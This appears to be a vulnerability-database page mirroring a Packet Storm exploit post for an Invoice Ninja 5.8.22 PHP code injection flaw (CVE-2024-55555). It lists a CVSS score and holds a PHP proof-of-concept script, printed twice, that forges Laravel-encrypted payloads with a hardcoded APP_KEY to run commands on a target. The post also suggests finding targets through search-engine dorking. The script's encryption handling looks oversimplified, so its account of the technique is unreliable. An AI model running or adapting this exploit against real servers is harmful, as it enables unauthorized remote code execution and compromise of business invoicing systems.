📄 Invoice Ninja 5.8.22 PHP Code Injection_PACKETSTORM:212935

8.8 / 10

HIGH

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

Invoice Ninja version 5.8.22 remote proof of concept exploit for a PHP code injection vulnerability...

Visit Original Source

Basic Information

ID PACKETSTORM:212935

Published Dec 17, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Invoice Ninja v 5.8.22 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://invoiceninja.com/ |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: A vulnerability in Invoice Ninja can also be exploited via a non-proficient character control attack using Laravel APP_KEY.

(Related : https://packetstorm.news/files/id/189419/ Related CVE numbers: CVE-2024-55555) .

[+] save code as poc.php.

[+] line 85 set target.

[+] Usage = php poc.php

[+] PayLoad :

<?php

// تعريف الدالة التي ستنفذ الأمر
function execute_command($url, $command, $app_key) {
$cipher_mode = 'AES-256-CBC';

// إرسال الطلب GET إلى نقطة النهاية
$response = send_request($url, 'GET', 'application/x-www-form-urlencoded', 'login');

if ($response['code'] != 200) {
die("لا يوجد استجابة صالحة من الهدف.");
}

// فك التشفير باستخدام APP_KEY
$xsrf_token = extract_xsrf_token($response['cookies']);
if (!$xsrf_token) {
die("لم يتم العثور على XSRF-TOKEN.");
}

$decrypted_value = laravel_decrypt($xsrf_token, $app_key, $cipher_mode);
if (!$decrypted_value) {
die("فك التشفير باستخدام APP_KEY فشل.");
}

echo "APP_KEY صالح: " . $app_key . "\n";
echo "القيمة المفكوكة: " . $decrypted_value . "\n";

// تجهيز الحمولة المشفرة
$payload = base64_encode($command); // استبدل بـ payload الخاص بك
$encrypted_payload = laravel_encrypt($payload, $app_key, $cipher_mode);

if (!$encrypted_payload) {
die("فشل التشفير باستخدام Laravel.");
}

// تنفيذ الأمر
send_request($url, 'GET', 'application/x-www-form-urlencoded', "route/$encrypted_payload");
}

// دالة إرسال الطلب
function send_request($url, $method, $content_type, $endpoint) {
$ch = curl_init();

curl_setopt($ch, CURLOPT_URL, $url . $endpoint);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
'Content-Type: ' . $content_type
]);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
$cookies = curl_getinfo($ch, CURLINFO_COOKIELIST);

curl_close($ch);

return ['code' => $http_code, 'cookies' => $cookies, 'response' => $response];
}

// دالة استخراج XSRF-TOKEN من الكوكيز
function extract_xsrf_token($cookies) {
foreach ($cookies as $cookie) {
if (strpos($cookie, 'XSRF-TOKEN') !== false) {
preg_match('/XSRF-TOKEN=([^;]+)/', $cookie, $matches);
return $matches[1];
}
}
return null;
}

// دالة فك التشفير
function laravel_decrypt($ciphertext, $key, $cipher_mode) {
// هنا يمكن استخدام خوارزمية AES لفك التشفير
// استخدم مكتبة OpenSSL في PHP لهذا الغرض
return openssl_decrypt(base64_decode($ciphertext), $cipher_mode, base64_decode($key), OPENSSL_RAW_DATA);
}

// دالة التشفير
function laravel_encrypt($plaintext, $key, $cipher_mode) {
// استخدم مكتبة OpenSSL في PHP للتشفير
return openssl_encrypt($plaintext, $cipher_mode, base64_decode($key), OPENSSL_RAW_DATA);
}

// استدعاء الوظائف مع القيم المناسبة
$url = "https://target.com";
$app_key = "base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno=";
$command = "ls -la"; // استبدل بالأمر المطلوب
execute_command($url, $command, $app_key);

?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-12-17T16:37:00",
    "description": "Invoice Ninja version 5.8.22 remote proof of concept exploit for a PHP code injection vulnerability...",
    "published": "2025-12-17T00:00:00",
    "modified": "2025-12-17T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Invoice Ninja 5.8.22 PHP Code Injection",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212935",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2024-55555"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Invoice Ninja v 5.8.22 PHP Code Injection Vulnerability                                                                     |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |\n    | # Vendor    : https://invoiceninja.com/                                                                                                   |\n    =============================================================================================================================================\n    \n    POC :\n    \n    [+] Dorking \u0130n Google Or Other Search Enggine.\n    \n    [+] Code Description: A vulnerability in Invoice Ninja can also be exploited via a non-proficient character control attack using Laravel APP_KEY.\n    \n       (Related : https://packetstorm.news/files/id/189419/ Related CVE numbers: CVE-2024-55555) .\n    \t\n    [+] save code as poc.php.\n    \n    [+] line 85 set target.\n    \n    [+] Usage = php poc.php\n    \n    [+] PayLoad :\n    \n    <?php\n    \n    // \u062a\u0639\u0631\u064a\u0641 \u0627\u0644\u062f\u0627\u0644\u0629 \u0627\u0644\u062a\u064a \u0633\u062a\u0646\u0641\u0630 \u0627\u0644\u0623\u0645\u0631\n    function execute_command($url, $command, $app_key) {\n        $cipher_mode = 'AES-256-CBC';\n    \n        // \u0625\u0631\u0633\u0627\u0644 \u0627\u0644\u0637\u0644\u0628 GET \u0625\u0644\u0649 \u0646\u0642\u0637\u0629 \u0627\u0644\u0646\u0647\u0627\u064a\u0629\n        $response = send_request($url, 'GET', 'application/x-www-form-urlencoded', 'login');\n    \n        if ($response['code'] != 200) {\n            die(\"\u0644\u0627 \u064a\u0648\u062c\u062f \u0627\u0633\u062a\u062c\u0627\u0628\u0629 \u0635\u0627\u0644\u062d\u0629 \u0645\u0646 \u0627\u0644\u0647\u062f\u0641.\");\n        }\n    \n        // \u0641\u0643 \u0627\u0644\u062a\u0634\u0641\u064a\u0631 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 APP_KEY\n        $xsrf_token = extract_xsrf_token($response['cookies']);\n        if (!$xsrf_token) {\n            die(\"\u0644\u0645 \u064a\u062a\u0645 \u0627\u0644\u0639\u062b\u0648\u0631 \u0639\u0644\u0649 XSRF-TOKEN.\");\n        }\n    \n        $decrypted_value = laravel_decrypt($xsrf_token, $app_key, $cipher_mode);\n        if (!$decrypted_value) {\n            die(\"\u0641\u0643 \u0627\u0644\u062a\u0634\u0641\u064a\u0631 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 APP_KEY \u0641\u0634\u0644.\");\n        }\n    \n        echo \"APP_KEY \u0635\u0627\u0644\u062d: \" . $app_key . \"\\n\";\n        echo \"\u0627\u0644\u0642\u064a\u0645\u0629 \u0627\u0644\u0645\u0641\u0643\u0648\u0643\u0629: \" . $decrypted_value . \"\\n\";\n    \n        // \u062a\u062c\u0647\u064a\u0632 \u0627\u0644\u062d\u0645\u0648\u0644\u0629 \u0627\u0644\u0645\u0634\u0641\u0631\u0629\n        $payload = base64_encode($command);  // \u0627\u0633\u062a\u0628\u062f\u0644 \u0628\u0640 payload \u0627\u0644\u062e\u0627\u0635 \u0628\u0643\n        $encrypted_payload = laravel_encrypt($payload, $app_key, $cipher_mode);\n    \n        if (!$encrypted_payload) {\n            die(\"\u0641\u0634\u0644 \u0627\u0644\u062a\u0634\u0641\u064a\u0631 \u0628\u0627\u0633\u062a\u062e\u062f\u0627\u0645 Laravel.\");\n        }\n    \n        // \u062a\u0646\u0641\u064a\u0630 \u0627\u0644\u0623\u0645\u0631\n        send_request($url, 'GET', 'application/x-www-form-urlencoded', \"route/$encrypted_payload\");\n    }\n    \n    // \u062f\u0627\u0644\u0629 \u0625\u0631\u0633\u0627\u0644 \u0627\u0644\u0637\u0644\u0628\n    function send_request($url, $method, $content_type, $endpoint) {\n        $ch = curl_init();\n    \n        curl_setopt($ch, CURLOPT_URL, $url . $endpoint);\n        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n        curl_setopt($ch, CURLOPT_HTTPHEADER, [\n            'Content-Type: ' . $content_type\n        ]);\n        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);\n    \n        $response = curl_exec($ch);\n        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);\n        $cookies = curl_getinfo($ch, CURLINFO_COOKIELIST);\n    \n        curl_close($ch);\n    \n        return ['code' => $http_code, 'cookies' => $cookies, 'response' => $response];\n    }\n    \n    // \u062f\u0627\u0644\u0629 \u0627\u0633\u062a\u062e\u0631\u0627\u062c XSRF-TOKEN \u0645\u0646 \u0627\u0644\u0643\u0648\u0643\u064a\u0632\n    function extract_xsrf_token($cookies) {\n        foreach ($cookies as $cookie) {\n            if (strpos($cookie, 'XSRF-TOKEN') !== false) {\n                preg_match('/XSRF-TOKEN=([^;]+)/', $cookie, $matches);\n                return $matches[1];\n            }\n        }\n        return null;\n    }\n    \n    // \u062f\u0627\u0644\u0629 \u0641\u0643 \u0627\u0644\u062a\u0634\u0641\u064a\u0631\n    function laravel_decrypt($ciphertext, $key, $cipher_mode) {\n        // \u0647\u0646\u0627 \u064a\u0645\u0643\u0646 \u0627\u0633\u062a\u062e\u062f\u0627\u0645 \u062e\u0648\u0627\u0631\u0632\u0645\u064a\u0629 AES \u0644\u0641\u0643 \u0627\u0644\u062a\u0634\u0641\u064a\u0631\n        // \u0627\u0633\u062a\u062e\u062f\u0645 \u0645\u0643\u062a\u0628\u0629 OpenSSL \u0641\u064a PHP \u0644\u0647\u0630\u0627 \u0627\u0644\u063a\u0631\u0636\n        return openssl_decrypt(base64_decode($ciphertext), $cipher_mode, base64_decode($key), OPENSSL_RAW_DATA);\n    }\n    \n    // \u062f\u0627\u0644\u0629 \u0627\u0644\u062a\u0634\u0641\u064a\u0631\n    function laravel_encrypt($plaintext, $key, $cipher_mode) {\n        // \u0627\u0633\u062a\u062e\u062f\u0645 \u0645\u0643\u062a\u0628\u0629 OpenSSL \u0641\u064a PHP \u0644\u0644\u062a\u0634\u0641\u064a\u0631\n        return openssl_encrypt($plaintext, $cipher_mode, base64_decode($key), OPENSSL_RAW_DATA);\n    }\n    \n    // \u0627\u0633\u062a\u062f\u0639\u0627\u0621 \u0627\u0644\u0648\u0638\u0627\u0626\u0641 \u0645\u0639 \u0627\u0644\u0642\u064a\u0645 \u0627\u0644\u0645\u0646\u0627\u0633\u0628\u0629\n    $url = \"https://target.com\";\n    $app_key = \"base64:RR++yx2rJ9kdxbdh3+AmbHLDQu+Q76i++co9Y8ybbno=\";\n    $command = \"ls -la\";  // \u0627\u0633\u062a\u0628\u062f\u0644 \u0628\u0627\u0644\u0623\u0645\u0631 \u0627\u0644\u0645\u0637\u0644\u0648\u0628\n    execute_command($url, $command, $app_key);\n    \n    ?>\n    \n    \n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/212935",
    "cvss": {
        "score": 8.8,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/212935/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply